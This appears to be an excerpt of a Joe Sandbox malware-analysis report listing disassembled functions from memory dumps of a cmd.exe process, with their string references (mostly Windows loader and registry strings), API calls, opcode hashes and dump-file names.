                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                        • API String ID: 0-2391371766
                                                                                        • Opcode ID: 7b54224e37ea211c494cbd3c639fd910eb5f07ea0d6e89ce157a834a5e81abbd
                                                                                        • Instruction ID: 7c8607868996d76eb8dfeeede6fe07da162cced34db9978a9cfc051c220e79f3
                                                                                        • Opcode Fuzzy Hash: 7b54224e37ea211c494cbd3c639fd910eb5f07ea0d6e89ce157a834a5e81abbd
                                                                                        • Instruction Fuzzy Hash: 07B1E379609341AFD711DF54C980B2BB7E8EB44718F0409BAFA499B2A1D778E804CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                        • API String ID: 0-2779062949
                                                                                        • Opcode ID: a741d1b21744922cd5bb072720143b3c35397376a36b1115fb5fbb4885a8904d
                                                                                        • Instruction ID: c5f8f8750d536c913a3bc7e2ee1ed5ab4febf27b7b9482ee02f741bee5b336bb
                                                                                        • Opcode Fuzzy Hash: a741d1b21744922cd5bb072720143b3c35397376a36b1115fb5fbb4885a8904d
                                                                                        • Instruction Fuzzy Hash: E3A18C359016299BDF31DF64CC88BEABBB8EF05708F1405EAE909AB250D7359E84CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B7327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                        • API String ID: 0-318774311
                                                                                        • Opcode ID: 3d028ef3f8971775231b98fd3d53f79ccb485e57e714f6ae7b78db7accd5fa5a
                                                                                        • Instruction ID: 874adabfb6aabb9634f6734b00cab367ecf6b8d72d6730509c5d3e4a23c34973
                                                                                        • Opcode Fuzzy Hash: 3d028ef3f8971775231b98fd3d53f79ccb485e57e714f6ae7b78db7accd5fa5a
                                                                                        • Instruction Fuzzy Hash: 8681A079608340AFD725CB14C844B6AB7E8EF84758F0909ADF9A9DB390DB74D900DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AEB360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                        • API String ID: 0-373624363
                                                                                        • Opcode ID: 1ab8d1e1474a219dbad4335b595cf3ca3dd28787a2c6ee5b7036e2fe32955938
                                                                                        • Instruction ID: 7760b2fe0f0836b2a94fab4582279ec233229c30051c7eca87ecaa6da40804d2
                                                                                        • Opcode Fuzzy Hash: 1ab8d1e1474a219dbad4335b595cf3ca3dd28787a2c6ee5b7036e2fe32955938
                                                                                        • Instruction Fuzzy Hash: EE91B075A08255CFDB21CF58D4547ADB7B4FF05318F1C41AAE826AB390D3789A80CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03BBB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • GlobalizationUserSettings, xrefs: 03BBB3B4
                                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03BBB3AA
                                                                                        • TargetNtPath, xrefs: 03BBB3AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                        • API String ID: 0-505981995
                                                                                        • Opcode ID: 69d374677fa24ead71df4f24333040f26cb73258f115346735da58f836fcf854
                                                                                        • Instruction ID: 69c1c35613058930a169ba3c9a6a4381787dff3dcad8c2df788e7e5ca4212fc8
                                                                                        • Opcode Fuzzy Hash: 69d374677fa24ead71df4f24333040f26cb73258f115346735da58f836fcf854
                                                                                        • Instruction Fuzzy Hash: 4C615D72D41229AFDB21DB54DC98BEAB7B8FB44714F0501E9E509AB250DBB4DE80CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B09723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 0-2283098728
                                                                                        • Opcode ID: ca1e2fa0385aefa91a02c8afe5a1bc828adf24b3b12e7d8b8013bc682ca19343
                                                                                        • Instruction ID: e457f2443ae5401f4ed35e406e1e40d0fe930a90a53045471e9c5f23e51beab9
                                                                                        • Opcode Fuzzy Hash: ca1e2fa0385aefa91a02c8afe5a1bc828adf24b3b12e7d8b8013bc682ca19343
                                                                                        • Instruction Fuzzy Hash: 3D51C0357007019FC724EF28C984B29BBA5FB8461CF1806FDE5569B6E6E7709804CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B643D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • LdrpCheckRedirection, xrefs: 03B6450F
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 03B64519
                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03B64508
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 0-3154609507
                                                                                        • Opcode ID: 59ab371b1947fb6c8c7d8c64090ae18cf806b667bc69f637a1cf9ec97a184696
                                                                                        • Instruction ID: 5178f0351515828011b7d003acfb4e94757c113a0276ab6d5dedc570be652e70
                                                                                        • Opcode Fuzzy Hash: 59ab371b1947fb6c8c7d8c64090ae18cf806b667bc69f637a1cf9ec97a184696
                                                                                        • Instruction Fuzzy Hash: 0441D332605B119FCB21CF5AD941A66B7E8FFC9658F0906F9EC58DB257DB38D8008B81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B132C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RtlCreateActivationContext, xrefs: 03B52803
                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 03B52808
                                                                                        • Actx , xrefs: 03B132CC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                        • API String ID: 0-859632880
                                                                                        • Opcode ID: 10300c21cd745772c587350c6625d488a3eaa63d9560cab7c9b8eb3871c8272e
                                                                                        • Instruction ID: 0b711f63a47ee80bb4ada9a2e89deaee9ee1c3498e59c0f026568c1c63f0939c
                                                                                        • Opcode Fuzzy Hash: 10300c21cd745772c587350c6625d488a3eaa63d9560cab7c9b8eb3871c8272e
                                                                                        • Instruction Fuzzy Hash: 8A3142366003049FDB16CE58E890B9AB7E4EF04718F4844B9FD098F286EB74E915CBE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B6B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 03B6B2B2
                                                                                        • @, xrefs: 03B6B2F0
                                                                                        • GlobalFlag, xrefs: 03B6B30F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                        • API String ID: 0-4192008846
                                                                                        • Opcode ID: 7b25454902e73662e342cbfa7d7f53edcbb9da41a2fe9a636ed884ccb7129e37
                                                                                        • Instruction ID: 25c097f0d56f7ae7d1cc992c73dca9a52003ed04adf1a890caf913e66f9605d2
                                                                                        • Opcode Fuzzy Hash: 7b25454902e73662e342cbfa7d7f53edcbb9da41a2fe9a636ed884ccb7129e37
                                                                                        • Instruction Fuzzy Hash: FC314D75A00219AEDB10EF95DD81AEEBBBCEF44748F4504BAE605EB241D7789F048B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B21190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • @, xrefs: 03B211C5
                                                                                        • BuildLabEx, xrefs: 03B2122F
                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03B2119B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                        • API String ID: 0-3051831665
                                                                                        • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                        • Instruction ID: 24d4cb53356321421fc38bd4d21cd45c158b571698c1a3f8c7db5fc2648970a5
                                                                                        • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                        • Instruction Fuzzy Hash: F0317076900229BBDB11DB94CC44EAEBF7DEB84758F004675F908EB260D730DA058BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AF51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@
                                                                                        • API String ID: 0-149943524
                                                                                        • Opcode ID: 0d41a6867b30c0a4716d69f221fc743b09dfab64f73e523aa8209635aff31c6d
                                                                                        • Instruction ID: d88d6d41ce26eb6efa202c3651e2184f48e38b6300882e569ca94c2fb61f13ca
                                                                                        • Opcode Fuzzy Hash: 0d41a6867b30c0a4716d69f221fc743b09dfab64f73e523aa8209635aff31c6d
                                                                                        • Instruction Fuzzy Hash: 18327B749083118FC728CF99C490B3AF7E5EF8A704F18496EFA958B290E734D945DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D76500 Relevance: 3.0, APIs: 2, Instructions: 49nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryInformationToken.NTDLL ref: 00D7652A
                                                                                        • NtQueryInformationToken.NTDLL ref: 00D82028
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationQueryToken
                                                                                        • String ID:
                                                                                        • API String ID: 4239771691-0
                                                                                        • Opcode ID: c8bd8fbb47c5079e39ff0e25e1cf91718b1b4e99369cc1066c5708b7db323d78
                                                                                        • Instruction ID: f105edabed1b087d96ad36ef6d02046c4ec5b134b24395ac20ccfcd9a964dfc9
                                                                                        • Opcode Fuzzy Hash: c8bd8fbb47c5079e39ff0e25e1cf91718b1b4e99369cc1066c5708b7db323d78
                                                                                        • Instruction Fuzzy Hash: D7017171A00208BBEB20DB58C844BFABBFCEB45711F1440A6E604E6044F3B0DA49EB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74823 Relevance: 3.0, APIs: 2, Instructions: 47filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00D7484F
                                                                                        • GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0(000000FF,0000000D,?,00000074), ref: 00D80993
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformation$HandleQueryVolume
                                                                                        • String ID:
                                                                                        • API String ID: 2149833895-0
                                                                                        • Opcode ID: e097141b3ee729c1f07495db628c7fe4df3ea7805a348564b8f403bc3799c2dc
                                                                                        • Instruction ID: d0f8a662cf68625a9cca825265da76205bd5bdfdbbc92e827ba505bf4b2aa1a0
                                                                                        • Opcode Fuzzy Hash: e097141b3ee729c1f07495db628c7fe4df3ea7805a348564b8f403bc3799c2dc
                                                                                        • Instruction Fuzzy Hash: 2201D831A0021CAAE7309B669C05FAE77B8EB45B24F414129E904D3181EBB499098BB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D848D7 Relevance: 3.0, APIs: 2, Instructions: 42timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,?,00D7A4C2,00D8E590,?,00002000), ref: 00D848F4
                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,00000000,?,00D7A4C2,00D8E590,?,00002000), ref: 00D84940
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$System$File
                                                                                        • String ID:
                                                                                        • API String ID: 2838179519-0
                                                                                        • Opcode ID: d3d1d2c39d7035b5caf0f5d3ebeb3aa22f00124ce2617f9f67a6cd0ae4df34f2
                                                                                        • Instruction ID: 6f0b4019f1aca97fc6f901622fb3c26ec8629318284dc0e098ad578f664d7550
                                                                                        • Opcode Fuzzy Hash: d3d1d2c39d7035b5caf0f5d3ebeb3aa22f00124ce2617f9f67a6cd0ae4df34f2
                                                                                        • Instruction Fuzzy Hash: 2701E96C91024A9A8B04EFA4D5045EEB774FF59704B215099E819E7311E731CE43CB7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B5E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        • Opcode ID: 9f20b753b63ade553e4f58b4228d02f40c0140805a7f5c52290390b62017255b
                                                                                        • Instruction ID: afb7e560759ff491f43814c17fd445cb8a22aa76f50ae67a07ee2344e7d29679
                                                                                        • Opcode Fuzzy Hash: 9f20b753b63ade553e4f58b4228d02f40c0140805a7f5c52290390b62017255b
                                                                                        • Instruction Fuzzy Hash: D5613C71A003189FDB15DFA8D940BADBBB9FB48708F1445BAF949EB251E730DA00CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AEA1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 03AEA21B
                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 03AEA229
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                        • API String ID: 0-2876891731
                                                                                        • Opcode ID: 3adf51ae7a7ad8fed08191ad2d44a62e3dd4a6a4a8b9ec4b6eb1bd0ab33d12eb
                                                                                        • Instruction ID: 53ac56a5fcf47f589dd14c606229026d41f469f12e17eaf28b9a8fe858de7b31
                                                                                        • Opcode Fuzzy Hash: 3adf51ae7a7ad8fed08191ad2d44a62e3dd4a6a4a8b9ec4b6eb1bd0ab33d12eb
                                                                                        • Instruction Fuzzy Hash: 2141AB35A00645DBDB29CF99C840B6AB7B8EF85708F1844BAE814EF3A1E736D901DB14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B7314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                        • API String ID: 0-118005554
                                                                                        • Opcode ID: fd6cfbb2861263df5a324426e62fe2c396393c40f29f30c12b4c8bd8a60261ac
                                                                                        • Instruction ID: eb1f1dd58c1fa6b83dad39ba7496526c9f79a5966636431640642f6e44f81e7f
                                                                                        • Opcode Fuzzy Hash: fd6cfbb2861263df5a324426e62fe2c396393c40f29f30c12b4c8bd8a60261ac
                                                                                        • Instruction Fuzzy Hash: 8431E1396087409FD311DB68D844B2AB7E4EF85718F0908AAF9688B780EB35D905D792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B131BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .Local\$@
                                                                                        • API String ID: 0-380025441
                                                                                        • Opcode ID: b87c6d3d971bddbc49b316799a4ddcf39d6bc051ce8dd1f38044dafa0141d387
                                                                                        • Instruction ID: cd8a577dae7476852c67613ace760bc9c4268f34789de6f1ed6dd1b64e33cacd
                                                                                        • Opcode Fuzzy Hash: b87c6d3d971bddbc49b316799a4ddcf39d6bc051ce8dd1f38044dafa0141d387
                                                                                        • Instruction Fuzzy Hash: 2731A479909301AFC710EF28C580A5BFBE8FB85658F4409BEF99987250E634DD148BD2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B133D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 03B5289F
                                                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 03B5289A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                        • API String ID: 0-2653619699
                                                                                        • Opcode ID: 6ede3b91b12de8c5b61a76815e1829d376470a40c2ed5d765d38aba330241974
                                                                                        • Instruction ID: 2d0832685a46975d401742667a4058342f2cd92287eef69ad94b4ee59f574f80
                                                                                        • Opcode Fuzzy Hash: 6ede3b91b12de8c5b61a76815e1829d376470a40c2ed5d765d38aba330241974
                                                                                        • Instruction Fuzzy Hash: 00110676B01204BFE725CA888D42F6BB6E8DB84B58F1884B9B9049F244E674DD0097A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6DCD0 Relevance: 2.5, APIs: 2, Instructions: 27memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
